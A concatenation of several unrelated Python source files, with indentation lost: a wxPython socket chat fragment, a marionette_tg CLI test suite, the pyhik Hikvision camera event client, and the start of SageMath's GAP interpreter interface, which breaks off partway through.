#print 'outer loop'
connection, address = sockobj.accept() # wait for next client connect
#print 'Server connected by', address # connection is a new socket
while self.keepRunning:
#print 'inner loop'
# read next line on client socket
data = connection.recv(1024)
if not data: break
self._parent.msgQueue.put(data)
wx.WakeUpIdle()
connection.close()
# The same port as used by the server
PORT = myPort
def echoSend(host, port, txt):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(txt)
s.close()
class Chat(model.Background):
def on_initialize(self, event):
self.msgQueue = Queue.Queue()
self.components.fldYourIPAddress.text = socket.gethostbyname(socket.gethostname())
self.echoServer = EchoServer(self)
self.thread = threading.Thread(target = self.echoServer.server)
# I think this allows Python to kill the thread when we quit wxPython
# setDaemon must be called before start
self.thread.setDaemon(1)
self.thread.start()
def on_idle(self, event):
if not self.msgQueue.empty():
msg = self.msgQueue.get()
self.doDisplayMsgReceived(msg)
event.RequestMore()
def doDisplayMsgReceived(self, data):
if data is not None:
self.components.fldTranscript.appendText(data + '\n')
else:
pass
def on_btnSend_mouseClick(self, event):
#print "btnSend", self.components.fldSendAddresses.text, PORT, self.components.fldInput.text
txt = self.components.fldNickname.text + \
" (" + self.components.fldYourIPAddress.text + "): " + \
self.components.fldInput.text
addresses = self.components.fldSendAddresses.text.split(',')
#print addresses
for ip in addresses:
echoSend(ip.strip(), PORT, txt)
self.components.fldTranscript.appendText(txt + '\n')
self.components.fldInput.text = ""
#print "after send"
def on_close(self, event):
self.echoServer.keepRunning = 0
event.skip()
if __name__ == '__main__':
app = model.Application(Chat)
app.MainLoop()
|
cli_tests.py
|
#!/usr/bin/env python
# coding: utf-8
import os
import sys
import time
import httplib
import unittest
import threading
sys.path.append('.')
import marionette_tg.conf
def execute(cmd):
os.system(cmd)
def exec_download():
client_listen_ip = marionette_tg.conf.get("client.client_ip")
conn = httplib.HTTPConnection(
client_listen_ip, 18079, False, timeout=30)
conn.request("GET", "/")
response = conn.getresponse()
actual_response = response.read()
conn.close()
expected_response = ''
for x in range(2**18):
expected_response += '_' + str(x)
assert actual_response == expected_response
return actual_response
class ParametrizedTestCase(unittest.TestCase):
""" TestCase classes that want to be parametrized should
inherit from this class.
"""
def __init__(self, methodName='runTest', param=None):
super(ParametrizedTestCase, self).__init__(methodName)
self.param = param
@staticmethod
def parametrize(testcase_klass, param=None):
""" Create a suite containing all tests taken from the given
subclass, passing them the parameter 'param'.
"""
testloader = unittest.TestLoader()
testnames = testloader.getTestCaseNames(testcase_klass)
suite = unittest.TestSuite()
for name in testnames:
suite.addTest(testcase_klass(name, param=param))
return suite
class CliTest(ParametrizedTestCase):
def startservers(self, format):
client_listen_ip = marionette_tg.conf.get("client.client_ip")
server_proxy_ip = marionette_tg.conf.get("server.proxy_ip")
execute("./bin/httpserver --local_port 18081 &")
execute("./bin/marionette_server --proxy_ip %s --proxy_port 18081 --format %s &" %
(server_proxy_ip, format))
time.sleep(5)
execute("./bin/marionette_client --client_ip %s --client_port 18079 --format %s &" %
(client_listen_ip, format))
time.sleep(5)
def stopservers(self):
execute("pkill -9 -f marionette_client")
execute("pkill -9 -f marionette_server")
execute("pkill -9 -f httpserver")
def dodownload_serial(self):
exec_download()
def dodownload_parallel(self):
simultaneous = 2
threads = []
for j in range(simultaneous):
t = threading.Thread(target=exec_download)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
def test_cli_curl(self):
if self.param:
try:
format = self.param
self.startservers(format)
self.dodownload_serial()
self.dodownload_parallel()
except Exception as e:
self.assertFalse(True, e)
finally:
sys.stdout.write(format+' ')
sys.stdout.flush()
self.stopservers()
suite = unittest.TestSuite()
for param in [
'dummy',
'http_timings',
'ftp_simple_blocking',
'http_simple_blocking',
'http_simple_blocking:20150701', # tests in-band nego.
'http_simple_blocking:20150702', # tests in-band nego.
'http_squid_blocking',
'http_simple_nonblocking',
'http_probabilistic_blocking',
'http_simple_blocking_with_msg_lens',
'ssh_simple_nonblocking',
'smb_simple_nonblocking',
'http_active_probing',
'http_active_probing2',
'active_probing/http_apache_247',
'active_probing/ssh_openssh_661',
'active_probing/ftp_pureftpd_10']:
suite.addTest(ParametrizedTestCase.parametrize(CliTest, param=param))
testresult = unittest.TextTestRunner(verbosity=2).run(suite)
sys.exit(not testresult.wasSuccessful())
|
hikvision.py
|
"""
pyhik.hikvision
~~~~~~~~~~~~~~~~~~~~
Provides api for Hikvision events
Copyright (c) 2016-2020 John Mihalic <https://github.com/mezz64>
Licensed under the MIT license.
Based on the following api documentation:
System:
http://oversea-download.hikvision.com/uploadfile/Leaflet/ISAPI/HIKVISION%20ISAPI_2.0-IPMD%20Service.pdf
Imaging:
http://oversea-download.hikvision.com/uploadfile/Leaflet/ISAPI/HIKVISION%20ISAPI_2.0-Image%20Service.pdf
"""
import time
import datetime
import logging
import uuid
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
import threading
import requests
from requests.auth import HTTPDigestAuth
# Make pydispatcher optional to support legacy implentations
# New usage should implement the event_callback
try:
from pydispatch import dispatcher
except ImportError:
dispatcher = None
from pyhik.watchdog import Watchdog
from pyhik.constants import (
DEFAULT_PORT, DEFAULT_HEADERS, XML_NAMESPACE, SENSOR_MAP,
CAM_DEVICE, NVR_DEVICE, CONNECT_TIMEOUT, READ_TIMEOUT, CONTEXT_INFO,
CONTEXT_TRIG, CONTEXT_MOTION, CONTEXT_ALERT, CHANNEL_NAMES, ID_TYPES,
__version__)
_LOGGING = logging.getLogger(__name__)
# Hide nuisance requests logging
logging.getLogger('urllib3').setLevel(logging.ERROR)
"""
Things still to do:
- Support status of day/night and switching
IR switch URL:
http://X.X.X.X/ISAPI/Image/channels/1/ircutFilter
report IR status and allow
"""
# pylint: disable=too-many-instance-attributes
class HikCamera(object):
"""Creates a new Hikvision api device."""
def __init__(self, host=None, port=DEFAULT_PORT,
usr=None, pwd=None):
"""Initialize device."""
_LOGGING.debug("pyHik %s initializing new hikvision device at: %s",
__version__, host)
self.event_states = {}
self.watchdog = Watchdog(300.0, self.watchdog_handler)
if not host:
_LOGGING.error('Host not specified! Cannot continue.')
return
self.host = host
self.usr = usr
self.pwd = pwd
self.cam_id = 0
self.name = ''
self.device_type = None
self.motion_detection = None
self._motion_detection_xml = None
self.root_url = '{}:{}'.format(host, port)
self.namespace = {
CONTEXT_INFO: None,
CONTEXT_TRIG: None,
CONTEXT_ALERT: None,
CONTEXT_MOTION: None
}
# Build requests session for main thread calls
# Default to basic authentication. It will change to digest inside
# get_device_info if basic fails
self.hik_request = requests.Session()
self.hik_request.auth = (usr, pwd)
self.hik_request.headers.update(DEFAULT_HEADERS)
# Define event stream processing thread
self.kill_thrd = threading.Event()
self.reset_thrd = threading.Event()
self.thrd = threading.Thread(
target=self.alert_stream, args=(self.reset_thrd, self.kill_thrd,))
self.thrd.daemon = False
# Callbacks
self._updateCallbacks = []
self.initialize()
@property
def get_id(self):
"""Returns unique camera/nvr identifier."""
return self.cam_id
@property
def get_name(self):
"""Return camera/nvr name."""
return self.name
@property
def get_type(self):
"""Return device type."""
return self.device_type
@property
def current_event_states(self):
"""Return Event states dictionary"""
return self.event_states
@property
def current_motion_detection_state(self):
"""Return current state of motion detection property"""
return self.motion_detection
def get_motion_detection(self):
"""Fetch current motion state from camera"""
url = ('%s/ISAPI/System/Video/inputs/'
'channels/1/motionDetection') % self.root_url
try:
response = self.hik_request.get(url, timeout=CONNECT_TIMEOUT)
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to fetch MotionDetection, error: %s', err)
self.motion_detection = None
return self.motion_detection
if response.status_code == requests.codes.unauthorized:
_LOGGING.error('Authentication failed')
self.motion_detection = None
return self.motion_detection
if response.status_code != requests.codes.ok:
# If we didn't receive 200, abort
_LOGGING.debug('Unable to fetch motion detection.')
self.motion_detection = None
return self.motion_detection
try:
tree = ET.fromstring(response.text)
self.fetch_namespace(tree, CONTEXT_MOTION)
enabled = tree.find(self.element_query('enabled', CONTEXT_MOTION))
if enabled is not None:
self._motion_detection_xml = tree
self.motion_detection = {'true': True, 'false': False}[enabled.text]
return self.motion_detection
except AttributeError as err:
_LOGGING.error('Entire response: %s', response.text)
_LOGGING.error('There was a problem: %s', err)
self.motion_detection = None
return self.motion_detection
def enable_motion_detection(self):
"""Enable motion detection"""
self._set_motion_detection(True)
def disable_motion_detection(self):
"""Disable motion detection"""
self._set_motion_detection(False)
def _set_motion_detection(self, enable):
"""Set desired motion detection state on camera"""
url = ('%s/ISAPI/System/Video/inputs/'
'channels/1/motionDetection') % self.root_url
enabled = self._motion_detection_xml.find(self.element_query('enabled', CONTEXT_MOTION))
if enabled is None:
_LOGGING.error("Couldn't find 'enabled' in the xml")
_LOGGING.error('XML: %s', ET.tostring(self._motion_detection_xml))
return
enabled.text = 'true' if enable else 'false'
xml = ET.tostring(self._motion_detection_xml)
try:
response = self.hik_request.put(url, data=xml, timeout=CONNECT_TIMEOUT)
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to set MotionDetection, error: %s', err)
return
if response.status_code == requests.codes.unauthorized:
_LOGGING.error('Authentication failed')
return
if response.status_code != requests.codes.ok:
# If we didn't receive 200, abort
_LOGGING.error('Unable to set motion detection: %s', response.text)
self.motion_detection = enable
def add_update_callback(self, callback, sensor):
"""Register as callback for when a matching device sensor changes."""
self._updateCallbacks.append([callback, sensor])
_LOGGING.debug('Added update callback to %s on %s', callback, sensor)
def _do_update_callback(self, msg):
"""Call registered callback functions."""
for callback, sensor in self._updateCallbacks:
if sensor == msg:
_LOGGING.debug('Update callback %s for sensor %s',
callback, sensor)
callback(msg)
def element_query(self, element, context):
"""Build tree query for a given element and context."""
if context == CONTEXT_INFO:
return '{%s}%s' % (self.namespace[CONTEXT_INFO], element)
elif context == CONTEXT_TRIG:
return '{%s}%s' % (self.namespace[CONTEXT_TRIG], element)
elif context == CONTEXT_ALERT:
return '{%s}%s' % (self.namespace[CONTEXT_ALERT], element)
elif context == CONTEXT_MOTION:
return '{%s}%s' % (self.namespace[CONTEXT_MOTION], element)
else:
return '{%s}%s' % (XML_NAMESPACE, element)
def fetch_namespace(self, tree, context):
"""Determine proper namespace to find given element."""
if context == CONTEXT_INFO:
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_INFO] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device info namespace: %s', self.namespace[CONTEXT_INFO])
elif context == CONTEXT_TRIG:
try:
# For triggers we *typically* only care about the sub-namespace
nmsp = tree[0][1].tag.split('}')[0].strip('{')
except IndexError:
# If get a index error check on top level
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_TRIG] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device triggers namespace: %s', self.namespace[CONTEXT_TRIG])
elif context == CONTEXT_ALERT:
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_ALERT] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device alerts namespace: %s', self.namespace[CONTEXT_ALERT])
elif context == CONTEXT_MOTION:
nmsp = tree.tag.split('}')[0].strip('{')
self.namespace[CONTEXT_MOTION] = nmsp if nmsp.startswith('http') else XML_NAMESPACE
_LOGGING.debug('Device motion namespace: %s', self.namespace[CONTEXT_MOTION])
def initialize(self):
"""Initialize deviceInfo and available events."""
device_info = self.get_device_info()
if device_info is None:
self.name = None
self.cam_id = None
self.event_states = None
return
for key in device_info:
if key == 'deviceName':
self.name = device_info[key]
elif key == 'deviceID':
if len(device_info[key]) > 10:
self.cam_id = device_info[key]
else:
self.cam_id = uuid.uuid4()
events_available = self.get_event_triggers()
if events_available:
for event, channel_list in events_available.items():
for channel in channel_list:
try:
self.event_states.setdefault(
SENSOR_MAP[event.lower()], []).append(
[False, channel, 0, datetime.datetime.now()])
except KeyError:
# Sensor type doesn't have a known friendly name
# We can't reliably handle it at this time...
_LOGGING.warning(
'Sensor type "%s" is unsupported.', event)
_LOGGING.debug('Initialized Dictionary: %s', self.event_states)
else:
_LOGGING.debug('No Events available in dictionary.')
self.get_motion_detection()
def get_device_info(self):
"""Parse deviceInfo into dictionary."""
device_info = {}
url = '%s/ISAPI/System/deviceInfo' % self.root_url
using_digest = False
try:
response = self.hik_request.get(url, timeout=CONNECT_TIMEOUT)
if response.status_code == requests.codes.unauthorized:
_LOGGING.debug('Basic authentication failed. Using digest.')
self.hik_request.auth = HTTPDigestAuth(self.usr, self.pwd)
using_digest = True
response = self.hik_request.get(url)
if response.status_code == requests.codes.not_found:
# Try alternate URL for deviceInfo
_LOGGING.debug('Using alternate deviceInfo URL.')
url = '%s/System/deviceInfo' % self.root_url
response = self.hik_request.get(url)
# Seems to be difference between camera and nvr, they can't seem to
# agree if they should 404 or 401 first
if not using_digest and response.status_code == requests.codes.unauthorized:
_LOGGING.debug('Basic authentication failed. Using digest.')
self.hik_request.auth = HTTPDigestAuth(self.usr, self.pwd)
using_digest = True
response = self.hik_request.get(url)
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to fetch deviceInfo, error: %s', err)
return None
if response.status_code == requests.codes.unauthorized:
_LOGGING.error('Authentication failed')
return None
if response.status_code != requests.codes.ok:
# If we didn't receive 200, abort
_LOGGING.debug('Unable to fetch device info.')
return None
try:
tree = ET.fromstring(response.text)
self.fetch_namespace(tree, CONTEXT_INFO)
for item in tree:
tag = item.tag.split('}')[1]
device_info[tag] = item.text
return device_info
except AttributeError as err:
_LOGGING.error('Entire response: %s', response.text)
_LOGGING.error('There was a problem: %s', err)
return None
def get_event_triggers(self):
"""
Returns dict of supported events.
Key = Event Type
List = Channels that have that event activated
"""
events = {}
nvrflag = False
event_xml = []
# different firmware versions support different endpoints.
urls = (
'%s/ISAPI/Event/triggers', # ISAPI v2.0+
'%s/Event/triggers', # Old devices?
)
response = {}
for url in urls:
try:
response = self.hik_request.get(url % self.root_url, timeout=CONNECT_TIMEOUT)
if response.status_code != requests.codes.ok:
# Try next alternate URL for triggers
_LOGGING.debug('Trying alternate triggers URL.')
continue
except (requests.exceptions.RequestException,
requests.exceptions.ConnectionError) as err:
_LOGGING.error('Unable to fetch events, error: %s', err)
return None
break
else:
_LOGGING.error('Unable to fetch events. '
'Device firmware may be old/bad.')
return None
# pylint: disable=too-many-nested-blocks
try:
content = ET.fromstring(response.text)
self.fetch_namespace(content, CONTEXT_TRIG)
if content[0].find(self.element_query('EventTrigger', CONTEXT_TRIG)):
event_xml = content[0].findall(
self.element_query('EventTrigger', CONTEXT_TRIG))
elif content.find(self.element_query('EventTrigger', CONTEXT_TRIG)):
# This is either an NVR or a rebadged camera
event_xml = content.findall(
self.element_query('EventTrigger', CONTEXT_TRIG))
for eventtrigger in event_xml:
ettype = eventtrigger.find(self.element_query('eventType', CONTEXT_TRIG))
# Catch empty xml defintions
if ettype is None:
break
etnotify = eventtrigger.find(
self.element_query('EventTriggerNotificationList', CONTEXT_TRIG))
etchannel = None
etchannel_num = 0
for node_name in CHANNEL_NAMES:
etchannel = eventtrigger.find(
self.element_query(node_name, CONTEXT_TRIG))
if etchannel is not None:
try:
# Need to make sure this is actually a number
etchannel_num = int(etchannel.text)
if etchannel_num > 1:
# Must be an nvr
nvrflag = True
break
except ValueError:
# Field must not be an integer
pass
if etnotify:
for notifytrigger in etnotify:
ntype = notifytrigger.find(
self.element_query('notificationMethod', CONTEXT_TRIG))
if ntype.text == 'center' or ntype.text == 'HTTP':
"""
If we got this far we found an event that we want
to track.
"""
events.setdefault(ettype.text, []) \
.append(etchannel_num)
except (AttributeError, ET.ParseError) as err:
_LOGGING.error(
'There was a problem finding an element: %s', err)
return None
if nvrflag:
self.device_type = NVR_DEVICE
else:
self.device_type = CAM_DEVICE
_LOGGING.debug('Processed %s as %s Device.',
self.cam_id, self.device_type)
_LOGGING.debug('Found events: %s', events)
self.hik_request.close()
return events
def watchdog_handler(self):
"""Take care of threads if wachdog expires."""
_LOGGING.debug('%s Watchdog expired. Resetting connection.', self.name)
self.watchdog.stop()
self.reset_thrd.set()
def disconnect(self):
"""Disconnect from event stream."""
_LOGGING.debug('Disconnecting from stream: %s', self.name)
self.kill_thrd.set()
self.thrd.join()
_LOGGING.debug('Event stream thread for %s is stopped', self.name)
self.kill_thrd.clear()
def start_stream(self):
"""Start thread to process event stream."""
# self.watchdog.start()
self.thrd.start()
def alert_stream(self, reset_event, kill_event):
"""Open event stream."""
_LOGGING.debug('Stream Thread Started: %s, %s', self.name, self.cam_id)
start_event = False
parse_string = ""
fail_count = 0
url = '%s/ISAPI/Event/notification/alertStream' % self.root_url
# pylint: disable=too-many-nested-blocks
while True:
try:
stream = self.hik_request.get(url, stream=True,
timeout=(CONNECT_TIMEOUT,
READ_TIMEOUT))
if stream.status_code == requests.codes.not_found:
# Try alternate URL for stream
url = '%s/Event/notification/alertStream' % self.root_url
stream = self.hik_request.get(url, stream=True)
if stream.status_code != requests.codes.ok:
raise ValueError('Connection unsucessful.')
else:
_LOGGING.debug('%s Connection Successful.', self.name)
fail_count = 0
self.watchdog.start()
for line in stream.iter_lines():
# _LOGGING.debug('Processing line from %s', self.name)
# filter out keep-alive new lines
if line:
str_line = line.decode("utf-8", "ignore")
# New events start with --boundry
if str_line.find('<EventNotificationAlert') != -1:
# Start of event message
start_event = True
parse_string = str_line
elif str_line.find('</EventNotificationAlert>') != -1:
# Message end found found
parse_string += str_line
start_event = False
if parse_string:
try:
tree = ET.fromstring(parse_string)
self.process_stream(tree)
self.update_stale()
except ET.ParseError as err:
_LOGGING.warning('XML parse error in stream.')
parse_string = ""
else:
if start_event:
parse_string += str_line
if kill_event.is_set():
# We were asked to stop the thread so lets do so.
break
elif reset_event.is_set():
# We need to reset the connection.
raise ValueError('Watchdog failed.')
if kill_event.is_set():
# We were asked to stop the thread so lets do so.
_LOGGING.debug('Stopping event stream thread for %s',
self.name)
self.watchdog.stop()
self.hik_request.close()
return
elif reset_event.is_set():
# We need to reset the connection.
raise ValueError('Watchdog failed.')
except (ValueError,
requests.exceptions.ConnectionError,
requests.exceptions.ChunkedEncodingError) as err:
fail_count += 1
reset_event.clear()
_LOGGING.warning('%s Connection Failed (count=%d). Waiting %ss. Err: %s',
self.name, fail_count, (fail_count * 5) + 5, err)
parse_string = ""
self.watchdog.stop()
self.hik_request.close()
time.sleep(5)
self.update_stale()
time.sleep(fail_count * 5)
continue
def process_stream(self, tree):
"""Process incoming event stream packets."""
if not self.namespace[CONTEXT_ALERT]:
self.fetch_namespace(tree, CONTEXT_ALERT)
try:
etype = SENSOR_MAP[tree.find(
self.element_query('eventType', CONTEXT_ALERT)).text.lower()]
estate = tree.find(
self.element_query('eventState', CONTEXT_ALERT)).text
for idtype in ID_TYPES:
echid = tree.find(self.element_query(idtype, CONTEXT_ALERT))
if echid is not None:
try:
# Need to make sure this is actually a number
echid = int(echid.text)
break
except (ValueError, TypeError) as err:
# Field must not be an integer or is blank
pass
ecount = tree.find(
self.element_query('activePostCount', CONTEXT_ALERT)).text
except (AttributeError, KeyError, IndexError) as err:
_LOGGING.error('Problem finding attribute: %s', err)
return
# Take care of keep-alive
if len(etype) > 0 and etype == 'Video Loss':
self.watchdog.pet()
# Track state if it's in the event list.
if len(etype) > 0:
state = self.fetch_attributes(etype, echid)
if state:
# Determine if state has changed
# If so, publish, otherwise do nothing
estate = (estate == 'active')
old_state = state[0]
attr = [estate, echid, int(ecount),
datetime.datetime.now()]
self.update_attributes(etype, echid, attr)
if estate != old_state:
self.publish_changes(etype, echid)
self.watchdog.pet()
def update_stale(self):
"""Update stale active statuses"""
# Some events don't post an inactive XML, only active.
# If we don't get an active update for 5 seconds we can
# assume the event is no longer active and update accordingly.
for etype, echannels in self.event_states.items():
for eprop in echannels:
if eprop[3] is not None:
sec_elap = ((datetime.datetime.now()-eprop[3])
.total_seconds())
# print('Seconds since last update: {}'.format(sec_elap))
if sec_elap > 5 and eprop[0] is True:
_LOGGING.debug('Updating stale event %s on CH(%s)',
etype, eprop[1])
attr = [False, eprop[1], eprop[2],
datetime.datetime.now()]
self.update_attributes(etype, eprop[1], attr)
self.publish_changes(etype, eprop[1])
def publish_changes(self, etype, echid):
"""Post updates for specified event type."""
_LOGGING.debug('%s Update: %s, %s',
self.name, etype, self.fetch_attributes(etype, echid))
signal = 'ValueChanged.{}'.format(self.cam_id)
sender = '{}.{}'.format(etype, echid)
if dispatcher:
dispatcher.send(signal=signal, sender=sender)
self._do_update_callback('{}.{}.{}'.format(self.cam_id, etype, echid))
def fetch_attributes(self, event, channel):
"""Returns attribute list for a given event/channel."""
try:
for sensor in self.event_states[event]:
if sensor[1] == int(channel):
return sensor
except KeyError:
return None
def update_attributes(self, event, channel, attr):
"""Update attribute list for current event/channel."""
try:
for i, sensor in enumerate(self.event_states[event]):
if sensor[1] == int(channel):
self.event_states[event][i] = attr
except KeyError:
_LOGGING.debug('Error updating attributes for: (%s, %s)',
event, channel)
|
gap.py
|
# -*- coding: utf-8 -*-
r"""
Interface to GAP
Sage provides an interface to the GAP system. This system provides
extensive group theory, combinatorics, etc.
The GAP interface will only work if GAP is installed on your
computer; this should be the case, since GAP is included with Sage.
The interface offers three pieces of functionality:
#. ``gap_console()`` - A function that dumps you into
an interactive command-line GAP session.
#. ``gap(expr)`` - Evaluation of arbitrary GAP
expressions, with the result returned as a string.
#. ``gap.new(expr)`` - Creation of a Sage object that
wraps a GAP object. This provides a Pythonic interface to GAP. For
example, if ``f=gap.new(10)``, then
``f.Factors()`` returns the prime factorization of
`10` computed using GAP.
First Examples
--------------
We factor an integer using GAP::
sage: n = gap(20062006); n
20062006
sage: n.parent()
Gap
sage: fac = n.Factors(); fac
[ 2, 17, 59, 73, 137 ]
sage: fac.parent()
Gap
sage: fac[1]
2
GAP and Singular
----------------
This example illustrates conversion between Singular and GAP via
Sage as an intermediate step. First we create and factor a Singular
polynomial.
::
sage: singular(389)
389
sage: R1 = singular.ring(0, '(x,y)', 'dp')
sage: f = singular('9*x^16-18*x^13*y^2-9*x^12*y^3+9*x^10*y^4-18*x^11*y^2+36*x^8*y^4+18*x^7*y^5-18*x^5*y^6+9*x^6*y^4-18*x^3*y^6-9*x^2*y^7+9*y^8')
sage: F = f.factorize()
sage: print(F)
[1]:
_[1]=9
_[2]=x^6-2*x^3*y^2-x^2*y^3+y^4
_[3]=-x^5+y^2
[2]:
1,1,2
Next we convert the factor `-x^5+y^2` to a Sage
multivariate polynomial. Note that it is important to let
`x` and `y` be the generators of a polynomial ring,
so the eval command works.
::
sage: R.<x,y> = PolynomialRing(QQ,2)
sage: s = F[1][3].sage_polystring(); s
'-x**5+y**2'
sage: g = eval(s); g
-x^5 + y^2
Next we create a polynomial ring in GAP and obtain its
indeterminates::
sage: R = gap.PolynomialRing('Rationals', 2); R
PolynomialRing( Rationals, ["x_1", "x_2"] )
sage: I = R.IndeterminatesOfPolynomialRing(); I
[ x_1, x_2 ]
In order to eval `g` in GAP, we need to tell GAP to view
the variables ``x0`` and ``x1`` as the two
generators of `R`. This is the one tricky part. In the GAP
interpreter the object ``I`` has its own name (which
isn't ``I``). We can access its name using
``I.name()``.
::
sage: _ = gap.eval("x := %s[1];; y := %s[2];;"%(I.name(), I.name()))
Now `x_0` and `x_1` are defined, so we can
construct the GAP polynomial `f` corresponding to
`g`::
sage: R.<x,y> = PolynomialRing(QQ,2)
sage: f = gap(str(g)); f
-x_1^5+x_2^2
We can call GAP functions on `f`. For example, we evaluate
the GAP ``Value`` function, which evaluates `f`
at the point `(1,2)`.
::
sage: f.Value(I, [1,2])
3
sage: g(1,2) # agrees
3
Saving and loading objects
--------------------------
Saving and loading GAP objects (using the dumps method, etc.) is
*not* supported, since the output string representation of Gap
objects is sometimes not valid input to GAP. Creating classes that
wrap GAP objects *is* supported, via simply defining the a
_gap_init_ member function that returns a string that when
evaluated in GAP constructs the object. See
``groups/perm_gps/permgroup.py`` for a nontrivial
example of this.
Long Input
----------
The GAP interface reads in even very long input (using files) in a
robust manner, as long as you are creating a new object.
.. note::
Using ``gap.eval`` for long input is much less robust, and is not
recommended.
::
sage: t = '"%s"'%10^10000 # ten thousand character string.
sage: a = gap(t)
Changing which GAP is used
--------------------------
Use this code to change which GAP interpreter is run. E.g.,
::
import sage.interfaces.gap
sage.interfaces.gap.gap_cmd = "/usr/local/bin/gap"
AUTHORS:
- David Joyner and William Stein: initial version(s)
- William Stein (2006-02-01): modified gap_console command so it uses
exactly the same startup command as Gap.__init__.
- William Stein (2006-03-02): added tab completions: gap.[tab], x =
gap(...), x.[tab], and docs, e.g., gap.function? and x.function?
"""
#*****************************************************************************
# Copyright (C) 2005 William Stein <wstein@gmail.com>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from __future__ import absolute_import, print_function
from .expect import Expect, ExpectElement, FunctionElement, ExpectFunction
from .gap_workspace import gap_workspace_file, prepare_workspace_dir
from sage.cpython.string import bytes_to_str
from sage.env import SAGE_EXTCODE
from sage.misc.misc import is_in_string
from sage.misc.cachefunc import cached_method
from sage.docs.instancedoc import instancedoc
from sage.interfaces.tab_completion import ExtraTabCompletion
from sage.structure.element import ModuleElement
import re
import os
import io
import pexpect
import time
import platform
import string
import warnings
WORKSPACE = gap_workspace_file()
first_try = True
gap_cmd = "gap -r"
if platform.processor() == 'ia64' and os.path.exists('/usr/bin/prctl'):
# suppress unaligned access to 0x..., ip=0x... warnings
gap_cmd = 'prctl --unaligned=silent ' + gap_cmd
def gap_command(use_workspace_cache=True, local=True):
if use_workspace_cache:
if local:
return "%s -L %s"%(gap_cmd, WORKSPACE), False
else:
# TO DO: Use remote workspace
return gap_cmd, False
else:
return gap_cmd, True
############ Set the GAP memory pool size
# you should always use get_gap_memory_pool_size() to access this value
gap_memory_pool_size = None
def set_gap_memory_pool_size(size_in_bytes):
"""
Set the desired gap memory pool size.
Subsequently started GAP instances will use this as default.
Already running instances are unchanged.
GAP will only reserve ``size_in_bytes`` address space. Unless you
actually start a big GAP computation, the memory will not be
used. However, corresponding swap space will be reserved so that
GAP will always be able to use the reserved address space if
needed. While nothing is actually written to disc as long as you
don't run a big GAP computation, the reserved swap space will not
be available for other processes.
INPUT:
- ``size_in_bytes`` -- integer. The desired memory pool size.
EXAMPLES::
sage: from sage.interfaces.gap import \
....: get_gap_memory_pool_size, set_gap_memory_pool_size
sage: n = get_gap_memory_pool_size()
sage: set_gap_memory_pool_size(n)
sage: n == get_gap_memory_pool_size()
True
sage: n # random output
1534059315
"""
global gap_memory_pool_size
gap_memory_pool_size = size_in_bytes
def get_gap_memory_pool_size():
"""
Get the gap memory pool size for new GAP processes.
EXAMPLES::
sage: from sage.interfaces.gap import get_gap_memory_pool_size
sage: get_gap_memory_pool_size() # random output
1534059315
"""
global gap_memory_pool_size
if gap_memory_pool_size is not None:
return gap_memory_pool_size
import psutil
from sage.misc.getusage import virtual_memory_limit
mem = psutil.virtual_memory()
swap = psutil.swap_memory()
vmax = virtual_memory_limit()
suggested_size = max(swap.free // 10, mem.available // 50)
# Don't eat all address space if the user set ulimit -v
suggested_size = min(suggested_size, vmax // 10)
# ~220MB is the minimum for long doctests
suggested_size = max(suggested_size, 250 * 1024**2)
return suggested_size
def _get_gap_memory_pool_size_MB():
"""
Return the gap memory pool size suitable for usage on the GAP
command line.
The GAP 4.5.6 command line parser had issues with large numbers, so
we return it in megabytes.
OUTPUT:
String.
EXAMPLES::
sage: from sage.interfaces.gap import \
....: _get_gap_memory_pool_size_MB
sage: _get_gap_memory_pool_size_MB() # random output
'1467m'
"""
pool = get_gap_memory_pool_size()
pool = (pool // (1024**2)) + 1
return str(pool)+'m'
############ Classes with methods for both the GAP3 and GAP4 interface
class Gap_generic(ExtraTabCompletion, Expect):
r"""
Generic interface to the GAP3/GAP4 interpreters.
AUTHORS:
- William Stein and David Joyner (interface for GAP4)
- Franco Saliola (Feb 2010): refactored to separate out the generic
code
"""
_identical_function = "IsIdenticalObj"
def _synchronize(self, timeout=0.5, cmd='%s;'):
"""
Synchronize GAP pexpect interface.
See the base method
:meth:`~sage.interfaces.expect.Expect._synchronize` for more
details.
We override this method since we are looking at GAP package
mode output, which is quite different from the normal
(human-readable) interface.
EXAMPLES::
sage: gap('"ok"')
ok
sage: gap._expect.sendline() # now we are out of sync
1
sage: gap._synchronize()
sage: gap(123)
123
"""
if self._expect is None:
return
E = self._expect
from sage.misc.prandom import randrange
rnd = randrange(2147483647)
cmd = str(rnd)+';'
try:
E.sendline(cmd)
E.expect(r'@[nf][@J\s>]*'+str(rnd), timeout=timeout)
E.send(' ')
E.expect('@i', timeout=timeout)
except pexpect.TIMEOUT:
self.interrupt()
except pexpect.EOF:
self._crash_msg()
self.quit()
def interrupt(self, tries=None, timeout=1, quit_on_fail=True):
"""
Interrupt the GAP process
Gap installs a SIGINT handler, we call it directly instead of
trying to sent Ctrl-C. Unlike
:meth:`~sage.interfaces.expect.Expect.interrupt`, we only try
once since we are knowing what we are doing.
Sometimes GAP dies while interrupting.
EXAMPLES::
sage: gap._eval_line('while(1=1) do i:=1;; od;', wait_for_prompt=False)
''
sage: rc = gap.interrupt(timeout=1)
sage: [ gap(i) for i in range(10) ] # check that it is still working
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TESTS::
sage: gap('"finished computation"'); gap.interrupt(); gap('"ok"')
finished computation
True
ok
"""
E = self._expect
if E is None:
return True
